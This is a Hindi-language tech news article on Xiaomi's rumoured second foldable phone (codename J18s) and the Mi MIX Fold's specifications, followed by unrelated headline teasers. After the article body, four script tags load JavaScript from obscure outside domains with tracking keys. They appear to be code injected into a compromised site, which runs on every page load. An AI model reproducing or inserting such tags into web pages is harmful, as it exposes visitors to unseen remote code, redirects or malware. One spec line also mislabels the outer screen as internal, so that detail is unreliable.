<p>मशहूर स्मार्टफोन निर्माता कंपनी शाओमी के दूसरे फोल्डेबल स्मार्टफोन का खुलासा हो गया है। फिलहाल दूसरे फोल्डेबल स्मार्टफोन के नाम का खुलासा नहीं हुआ है। फिलहाल इसे कोडनेम J18s से लिस्ट किया गया है। इससे पहले इसी साल मार्च में Xiaomi के पहले फोल्डेबल स्मार्टफोन Mi MIX Fold की जानकारी लीक हुई है। हालांकि अब कंपनी ने अपने दूसरे फोल्डेबल स्मार्टफोन की लॉन्चिंग की तैयारी कर रही है। फोन को साल चौथे क्वार्टर यानी साल के आखिरी तक लॉन्च कर सकती है। इस हैंडसेट में अंदर और बाहर की तरफ मुड़ने वाला डिस्प्ले होगा फोन हाई रिफ्रेश्ड रेट के साथ आएगा। फोन में Qualcomm Snapdragon 888 चिपसेट का सपोर्ट दिया जा सकता है।</p>
<p><span style=”color:#e74c3c”><strong>Mi MIX Fold स्पेसिफिकेशन्स</strong></span></p>
<p>Mi MIX Fold में एक 8.01 इंच WQHD (वाइड क्वाड हाई डेफिनिशन ) प्लस रेजोल्यूशन के साथ फ्लैक्सिबल इंटरनल डिस्प्ले दी गई है। वहीं इंटरनल 6.52 इंच एमोलेड डिस्प्ले मिलेगी। फ्रंट स्क्रीन में 90Hz रिफ्रेश्ड रेट और 180Hz टच सैंपलिंग रेट दिया जाएगा। साथ ही यह HD+ रेजोल्यूशन के साथ आएगा। फोन में Qualcomm Snapdragon 888 प्रोसेसर के साथ 5020mAh बैटरी दी गई है। इसे टर्बो चार्जिंग का सपोर्ट दिया गया है। इस डिवाइस में पहली बार Xiaomi के Surge C1 इमेज सेंसर का इस्तेमाल किया जाएगा, जो फोटोग्राफी के लिए शानदार साबित हो सकता है। साथ ही पहली बार फोन में लिक्विड लेंस दिया जाएगा। इसमें U-शेप्ड हिंज डिजाइन मिलेगी। कंपनी का दावा है कि बाकी फोल्डेबल स्मार्टफोन के मुकाबले शाओमी के फोल्डेबल स्मार्टफोन का वजन 27 फीसदी कम होगा।</p>
<p><span style=”color:#e67e22″><strong>Xiaomi J18s स्पेसिफिकेशन्स</strong></span></p>
<p>पावर बैकअप के लिए Xiaomi J18s में एक 5,000mAh की बैटरी मिलेगी। GizmoChina की रिपोर्ट के मुताबिक Xiaomi J18s की इंटरनल स्क्रीन में Samsung डिस्प्ले का इस्तेमाल किया जाएगा। इसका रिफ्रेश्ड रेट 120Hz होगा। वहीं एक्सटर्नर पैनल में Visionox का डिस्प्ले दिया जाएगा। इसमें एक अंडर डिस्प्ले कैमरा दिया गया है। फोन की एक्सटर्नल डिस्प्ले 90Hz रिफ्रेश्ड रेट सपोर्ट के साथ आएगी। फोल्डेबल स्मार्टफोन में 108MP का प्राइमरी कैमरा दिया जा सकता है। साथ ही एक सेंसर दिया जाएगा, जो 3x लिक्विड लेंस सपोर्ट के साथ आएगा। इसके अलावा एक अल्ट्रा-वाइड एंगल लेंस का सपोर्ट दिया गया है। Xiaomi का दूसरा फोल्डेबल स्मार्टफोन कुछ बदलावा के साथ ही पहले फोल्डेबल स्मार्टफोन की तरह पेश किया जा सकता है।</p>
<p><img src=”/media/gallery/images/image(2844).png” style=”height:110px; width:900px” /></p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1623905754239″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
बिलासपुर में नवजात बच्ची को सड़क किनारे कूड़े में छोड़ा गया पुलिस ने जांच शुरू…
भाजपा ने दिल्ली चुनाव के लिए उम्मीदवारों की पहली सूची जारी की। नई दिल्ली से…
हमीरपुर के पूर्व सैनिक रोजगार सेल द्वारा 1550 पदों के लिए अधिसूचना जारी साक्षात्कार 17…
चीन में ह्यूमन मेटान्यूमोवायरस (HMPV) के मामलों में तेजी, कई क्षेत्रों में इमरजेंसी घोषित HMPV…
नए शैक्षणिक सत्र 2025-26 से छात्रों को नजदीकी स्कूलों में स्थानांतरित किया जाएगा 10 से…
आज 4 जनवरी 2025 को पौष शुक्ल पंचमी तिथि और शतभिषा नक्षत्र। राहुकाल सुबह 9…